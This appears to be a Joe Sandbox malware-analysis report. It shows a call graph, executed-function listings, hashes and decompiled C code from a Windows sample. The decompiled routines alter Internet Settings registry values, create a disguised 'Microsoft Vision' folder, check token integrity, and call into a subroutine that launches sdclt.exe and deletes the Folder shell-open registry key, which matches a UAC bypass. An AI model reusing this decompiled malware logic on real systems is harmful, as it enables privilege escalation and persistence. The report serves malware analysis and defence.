VirtualFree 28492->28494 28495 cc12d4 28500 cc19aa SetUnhandledExceptionFilter 28495->28500 28497 cc12d9 pre_c_initialization 28501 cc554a 26 API calls 2 library calls 28497->28501 28499 cc12e4 28500->28497 28501->28499 28502 cc79b4 28510 cc6499 28502->28510 28505 cc79c8 28507 cc79d0 28508 cc79dd 28507->28508 28518 cc79e0 11 API calls 28507->28518 28511 cc63c0 pre_c_initialization 5 API calls 28510->28511 28512 cc64c0 28511->28512 28513 cc64d8 TlsAlloc 28512->28513 28514 cc64c9 28512->28514 28513->28514 28515 cc1c5e _ValidateLocalCookies 5 API calls 28514->28515 28516 cc64e9 28515->28516 28516->28505 28517 cc7901 20 API calls 2 library calls 28516->28517 28517->28507 28518->28505 28519 43119e 28522 441824 28519->28522 28595 432460 28522->28595 28525 432460 VirtualAlloc 28526 441841 28525->28526 28527 432460 VirtualAlloc 28526->28527 28528 44184b 28527->28528 28529 432460 VirtualAlloc 28528->28529 28530 441855 28529->28530 28531 432460 VirtualAlloc 28530->28531 28532 44185f 28531->28532 28533 432460 VirtualAlloc 28532->28533 28534 441869 28533->28534 28598 4310ad GetProcessHeap HeapAlloc 28534->28598 28536 441890 28599 4310ad GetProcessHeap HeapAlloc 28536->28599 28538 441899 28600 4310ad GetProcessHeap HeapAlloc 28538->28600 28540 4418a2 28601 4310ad GetProcessHeap HeapAlloc 28540->28601 28542 4418ab 28602 4310ad GetProcessHeap HeapAlloc 28542->28602 28544 4418b5 28603 4310ad GetProcessHeap HeapAlloc 28544->28603 28546 4418bf 28604 43fadf 28546->28604 28549 43fadf 2 API calls 28550 4418d0 28549->28550 28551 43fadf 2 API calls 28550->28551 28552 4418d7 28551->28552 28553 43fadf 2 API calls 28552->28553 28554 4418df 28553->28554 28555 43fadf 2 API calls 28554->28555 28556 4418e7 28555->28556 28557 43fadf 2 API calls 28556->28557 28558 4418ef 28557->28558 28559 4331ec 4 API calls 28558->28559 28560 4418fb 28559->28560 28608 43dd40 28560->28608 28562 441906 28611 435a2d VirtualFree 28562->28611 28564 44190e 28565 4331ec 4 API calls 28564->28565 28566 441918 28565->28566 28567 43dd40 5 API calls 28566->28567 28568 441923 28567->28568 28612 435a2d VirtualFree 28568->28612 28570 44192b 28571 4331ec 4 API calls 28570->28571 28572 441935 28571->28572 28573 43dd40 5 API calls 28572->28573 28574 441940 28573->28574 28613 435a2d VirtualFree 28574->28613 28576 441948 28577 4331ec 4 API calls 28576->28577 28578 441954 28577->28578 28579 43dd40 5 API calls 28578->28579 28580 44195f 28579->28580 28614 435a2d VirtualFree 28580->28614 28582 441967 28583 4331ec 4 API calls 28582->28583 28584 441973 28583->28584 28585 43dd40 5 API calls 28584->28585 28586 44197e 28585->28586 28615 435a2d VirtualFree 28586->28615 28588 441986 28589 4331ec 4 API calls 28588->28589 28590 441992 28589->28590 28591 43dd40 5 API calls 28590->28591 28592 44199d 28591->28592 28616 435a2d VirtualFree 28592->28616 28594 4311a3 28617 43dd6c 28595->28617 28598->28536 28599->28538 28600->28540 28601->28542 28602->28544 28603->28546 28605 43fae5 28604->28605 28607 43fb02 28605->28607 28620 43fb09 Sleep GetTickCount 28605->28620 28607->28549 28609 432f52 4 API calls 28608->28609 28610 43dd52 CreateEventA 28609->28610 28610->28562 28611->28564 28612->28570 28613->28576 28614->28582 28615->28588 28616->28594 28618 432ff0 VirtualAlloc 28617->28618 28619 432473 28618->28619 28619->28525 28620->28605

                                      Executed Functions

                                      Function 00CD7A20, Relevance: 511.8, APIs: 2, Strings: 289, Instructions: 2543memoryUNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00CD0BBA,00003000,00000004), ref: 00CD7B75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: In 2010 the government approved a 3.4 billion settlement for the trust case Major portions of the settlement were to partially compensate individual account holders and to buy back fractionated land interests and restore land to reservations$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 4275171209-94128256
                                      • Opcode ID: ef4d03fe8b7e0ecf86cd628faa2371a4c098569ff260e7992737a7b82c618b8a
                                      • Instruction ID: 85f185384def0afd7ead37903f8a641be40241f7e11d683bc6579871d39cb5e7
                                      • Opcode Fuzzy Hash: ef4d03fe8b7e0ecf86cd628faa2371a4c098569ff260e7992737a7b82c618b8a
                                      • Instruction Fuzzy Hash: 15F27FFAA503417EEB017369AC03F3E316DC783B54F584948BA24AA3D3E576E9245378
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CD6AA6, Relevance: 155.8, APIs: 1, Strings: 102, Instructions: 1267sleepUNIQUE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: 7$g_32969$g_33076$g_33266$g_33291$g_33331$g_33450$g_33784[i]$g_33906$g_34033[i][j]$g_34059$g_34335.f0$g_34335.f1$g_34335.f2$g_34335.f3$g_34335.f4$g_34597$g_34732.f0$g_34732.f1$g_34732.f2$g_34732.f3$g_34732.f4$g_34741$g_34858.f0$g_34858.f1$g_34858.f2$g_34858.f3$g_34858.f4$g_35067[i][j][k][l]$g_35113$g_35507$g_35613$g_35689$g_35997$g_36187$g_36207[i][j][k][l]$g_36312$g_36345$g_36361$g_36436$g_36525$g_36532[i][j]$g_36590[i]$g_36642$g_36953$g_37038$g_37257[i][j][k]$g_37445[i][j]$g_37452$g_37527$g_37537$g_37541$g_37560$g_37723$g_37892[i][j][k][l]$g_37946[i]$g_38136$g_38176$g_38237$g_38283$g_38304$g_38365$g_38536$g_38649[i][j]$g_38652$g_38688$g_38701$g_38723$g_38756$g_38758$g_38769[i]$g_38773$g_38775$g_38781$g_38782[i]$g_38790[i][j]$g_38794$g_38920$g_38925$g_39006$g_39046$g_39047$g_39180$g_39383$g_39385[i][j][k]$g_39448[i]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]
                                      • API String ID: 3472027048-4294153300
                                      • Opcode ID: 7796fc7bf4f7ede429a0869c31b5b1a287679219d77e27f19c11f411f5695e85
                                      • Instruction ID: 5e51fc1f676e758e5dffad4b191ddfb70bfada9d2f00399e4ce0ea8a6f2967b7
                                      • Opcode Fuzzy Hash: 7796fc7bf4f7ede429a0869c31b5b1a287679219d77e27f19c11f411f5695e85
                                      • Instruction Fuzzy Hash: B8A28EB5D00204FFEB04EB99DC86EBE7779EB86704F14858DF61197342E630AA50EB61
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC19AA, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000019B6), ref: 00CC19AF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 5bfc31e259196772668c4016f50537dc4c824d3831615682554ba3a335b58f4f
                                      • Instruction ID: 1590faadc88476ce92982334ce7e296e9b4115c1cddb4637cd73d6111876343f
                                      • Opcode Fuzzy Hash: 5bfc31e259196772668c4016f50537dc4c824d3831615682554ba3a335b58f4f
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Function 004411D0, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 137registrystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 93%
                                      			E004411D0(void* __edx, void* __edi, void* __eflags) {
				char _v584;
				char _v600;
				char _v1112;
				short _v1132;
				intOrPtr _v1212;
				char _v1216;
				char _v1228;
				char _v1232;
				char _v1248;
				intOrPtr _v1264;
				intOrPtr _v1272;
				intOrPtr _v1280;
				intOrPtr _v1296;
				intOrPtr _v1304;
				char _v1308;
				char _v1312;
				int _v1320;
				char _v1328;
				void* _v1332;
				char _v1336;
				char _v1340;
				char _v1344;
				char _v1348;
				intOrPtr _v1360;
				void* __ebx;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t86;
				char* _t100;
				void* _t104;
				void* _t105;
				void* _t110;

				_t110 = __eflags;
				_t105 = __edi;
				_t104 = __edx;
				_v1328 = 0xa;
				_v1320 = 0;
				E00435779( &_v1308);
				E0043F43F( &_v1228);
				E00431085(GetTickCount());
				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1332,  &_v1320); // executed
				RegSetValueExA(_v1332, "MaxConnectionsPer1_0Server", 0, 4,  &_v1328, 4); // executed
				RegSetValueExA(_v1332, "MaxConnectionsPerServer", 0, 4,  &_v1328, 4); // executed
				RegCloseKey(_v1332); // executed
				E004355A0( &_v1308, _t104, _t110); // executed
				E0043F2AD( &_v1228, _t104, _t110,  &_v1308); // executed
				_t94 =  &_v584;
				E00434B0F( &_v584, _t104, _t110,  &_v1312,  &_v1232); // executed
				E00431052( &_v1112, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1112, _t86); // executed
				lstrcatW( &_v1132, L"\\Microsoft Vision\\");
				CreateDirectoryW( &_v1132, 0); // executed
				if(_v1280 != 0) {
					_t82 = E0043DB97(); // executed
					if(_t82 != 1) {
						_t83 = E0043D4B8();
						_t113 = _t83 - 0xa;
						if(_t83 != 0xa) {
							E0043F843(0,  &_v584, __eflags);
						} else {
							E0043F8C0(_t104, _t113);
						}
					}
				}
				if(_v1264 != 0) {
					_t80 = E0043DB97();
					_t115 = _t80 - 1;
					if(_t80 == 1) {
						E00440D9D(_t94, _t115);
					}
				}
				_t116 = _v1212;
				if(_v1212 != 0) {
					L11:
					__eflags = _v1272;
					if(__eflags != 0) {
						E0043FCD9();
					}
					E00434A83( &_v600, _t104, __eflags); // executed
					goto L14;
				} else {
					E0043F0C8( &_v1248, _t116, _v1304, _v1296);
					_t117 = _v1312;
					if(_v1312 == 0) {
						goto L11;
					} else {
						_v1336 = 0;
						_t100 =  &_v1344;
						E0043345A(_t100,  &_v1216);
						_push(_t100);
						E0043EB77( &_v1336, _t117,  &_v1348,  &_v1340);
						E00435A2D(_v1360);
						E00435A2D(0);
						L14:
						E00434820( &_v600, _t105, _t117);
						E0043F069( &_v1248);
						E0043579E( &_v1328, _t105);
						return 0;
					}
				}
			}




































                                      0x004411d0
                                      0x004411d0
                                      0x004411d0
                                      0x004411df
                                      0x004411eb
                                      0x004411ef
                                      0x004411f8
                                      0x00441204
                                      0x00441227
                                      0x00441240
                                      0x00441259
                                      0x00441263
                                      0x0044126d
                                      0x0044127b
                                      0x0044128a
                                      0x00441291
                                      0x004412a4
                                      0x004412b9
                                      0x004412cc
                                      0x004412db
                                      0x004412e5
                                      0x004412e7
                                      0x004412ef
                                      0x004412f1
                                      0x004412f6
                                      0x004412f9
                                      0x00441302
                                      0x004412fb
                                      0x004412fb
                                      0x004412fb
                                      0x004412f9
                                      0x004412ef
                                      0x0044130b
                                      0x0044130d
                                      0x00441312
                                      0x00441315
                                      0x00441317
                                      0x00441317
                                      0x00441315
                                      0x0044131c
                                      0x00441323
                                      0x00441377
                                      0x00441377
                                      0x0044137b
                                      0x0044137d
                                      0x0044137d
                                      0x00441389
                                      0x00000000
                                      0x00441325
                                      0x00441331
                                      0x00441336
                                      0x0044133a
                                      0x00000000
                                      0x0044133c
                                      0x00441343
                                      0x00441348
                                      0x0044134c
                                      0x00441351
                                      0x00441360
                                      0x00441369
                                      0x00441370
                                      0x0044138e
                                      0x00441395
                                      0x0044139e
                                      0x004413a7
                                      0x004413b2
                                      0x004413b2
                                      0x0044133a

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004411FD
                                      • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,0000000A,?), ref: 00441227
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00441240
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00441259
                                      • RegCloseKey.KERNEL32(?), ref: 00441263
                                        • Part of subcall function 004355A0: Sleep.KERNEL32(000001F4,?,?,00000000), ref: 004355B6
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004412B9
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004412CC
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 004412DB
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                        • Part of subcall function 0043D4B8: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D4D0
                                        • Part of subcall function 0043D4B8: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043D4E0
                                        • Part of subcall function 0043F8C0: GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0043F8E2
                                        • Part of subcall function 0043F8C0: IsWow64Process.KERNEL32(00000000), ref: 0043F8E9
                                        • Part of subcall function 0043F8C0: GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0043F920
                                        • Part of subcall function 0043F8C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0043F952
                                        • Part of subcall function 0043F8C0: lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0043F964
                                        • Part of subcall function 0043F8C0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0043F97C
                                        • Part of subcall function 0043F8C0: ShellExecuteExW.SHELL32(?), ref: 0043F9AE
                                        • Part of subcall function 0043F8C0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0043F9B8
                                        • Part of subcall function 0043F8C0: Sleep.KERNEL32(000007D0), ref: 0043F9D0
                                        • Part of subcall function 0043F8C0: RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0043F9E0
                                        • Part of subcall function 0043F8C0: ExitProcess.KERNEL32 ref: 0043F9E7
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 0044121D
                                      • \Microsoft Vision\, xrefs: 004412BF
                                      • MaxConnectionsPer1_0Server, xrefs: 00441237
                                      • MaxConnectionsPerServer, xrefs: 00441250
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentDirectoryExecuteShellSleepTokenValuelstrcat$AddressCountDeleteExitFileFolderHandleInformationLibraryLoadModuleNameOpenPathProcSystemTerminateTickWow64
                                      • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                      • API String ID: 2133878423-2552559493
                                      • Opcode ID: 2aa71526f58341c87374b3035a7e9d146eabac71b71e1cb94b081245bb7a7c7c
                                      • Instruction ID: 91789f247b27ab9b108eed654d3fb21c2abac9c5050226b34724df1408aa4825
                                      • Opcode Fuzzy Hash: 2aa71526f58341c87374b3035a7e9d146eabac71b71e1cb94b081245bb7a7c7c
                                      • Instruction Fuzzy Hash: 60416371404345ABE324EFA1DC85EAFB7ECBF98305F40193FB69181461DB789948CB5A
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Function 004406D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 138comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1028 4406d5-44070f CoInitialize CoCreateInstance 1029 440715-440721 1028->1029 1030 44082c-440830 1028->1030 1031 440725-44072a 1029->1031 1031->1030 1032 440730-440738 1031->1032 1034 4407e8-440800 1032->1034 1036 440806-44080b 1034->1036 1037 44073d-440756 1034->1037 1038 440816-44081b 1036->1038 1039 44080d-440813 1036->1039 1037->1036 1043 44075c-44077b VariantInit 1037->1043 1041 440826 CoUninitialize 1038->1041 1042 44081d-440823 1038->1042 1039->1038 1041->1030 1042->1041 1047 440794-44079e call 435adb 1043->1047 1048 44077d-440792 1043->1048 1052 4407a0-4407a9 call 44098d 1047->1052 1053 4407ab 1047->1053 1048->1036 1048->1047 1055 4407ad-4407b6 1052->1055 1053->1055 1057 4407d6-4407e6 call 43239f 1055->1057 1058 4407b8 1055->1058 1057->1034 1059 4407ba-4407d4 1058->1059 1059->1057 1059->1059
                                      C-Code - Quality: 59%
                                      			E004406D5(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x4425a0, 0, 1, 0x444834, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x442590,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t50 = _v24 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x442520,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E00435ADB(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E0044098D(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E0043239F(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}






























                                      0x004406de
                                      0x004406e0
                                      0x004406e4
                                      0x004406ea
                                      0x004406ed
                                      0x004406fe
                                      0x00440701
                                      0x00440704
                                      0x0044070a
                                      0x0044070f
                                      0x00440722
                                      0x00440725
                                      0x0044072a
                                      0x00440733
                                      0x00440736
                                      0x004407e8
                                      0x004407e8
                                      0x004407f2
                                      0x004407fb
                                      0x00440800
                                      0x00000000
                                      0x00000000
                                      0x0044074a
                                      0x00440751
                                      0x00440756
                                      0x00000000
                                      0x00000000
                                      0x00440760
                                      0x00440766
                                      0x0044076c
                                      0x0044076d
                                      0x0044076e
                                      0x00440775
                                      0x0044077b
                                      0x00440794
                                      0x00440796
                                      0x0044079e
                                      0x004407ab
                                      0x004407a0
                                      0x004407a7
                                      0x004407a7
                                      0x004407ad
                                      0x004407b0
                                      0x004407b6
                                      0x004407d6
                                      0x004407da
                                      0x004407e0
                                      0x004407e5
                                      0x004407e6
                                      0x00000000
